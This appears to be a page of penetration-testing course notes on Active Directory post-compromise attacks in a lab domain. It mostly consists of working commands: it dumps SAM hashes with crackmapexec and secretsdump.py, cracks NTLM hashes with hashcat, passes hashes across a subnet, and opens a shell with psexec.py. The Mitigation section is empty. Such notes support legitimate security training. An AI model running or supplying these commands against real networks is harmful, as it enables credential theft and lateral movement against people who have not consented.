Post Compromise Attacks

Pass the Password:

Installing crackmapexec:

Always ADD "smb" in front of the ip address #recent change

dumping hashes with crackmapexec:

crackmapexec smb 10.10.10.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

Dumping hashes with secretsdump.py:

secretsdump.py marvel/fcastle:Password1@10.10.10.138

Crack NTLM Hashes with Hashcat:

ntlm - module 1000

ntlm2 - module 5600

You can pass around ntlm hashes. You CANNOT pass around ntlm2 hashes.

hashcat.exe -m 1000 hash2.txt D:\WPA\PT\RESOURCES\wordlists\RockYou\rockyou.txt -d 1 -O

Pass the Hash:

We use again crackmapexec to pass the hashes over the network:

crackmapexec smb 10.10.10.0/24 -u "Frank Castle" -H 358a34f0c492afc079d6ad206b4ce273 --local-auth

Attempt to get a shell:

psexec.py "frank castle":@10.10.10.129 -hashes aad3b435b51404eeaad3b435b51404ee:358a34f0c492afc079d6ad206b4ce273

Mitigation:

PreviousBloodhound NextToken Impersonation

Last updated 1 year ago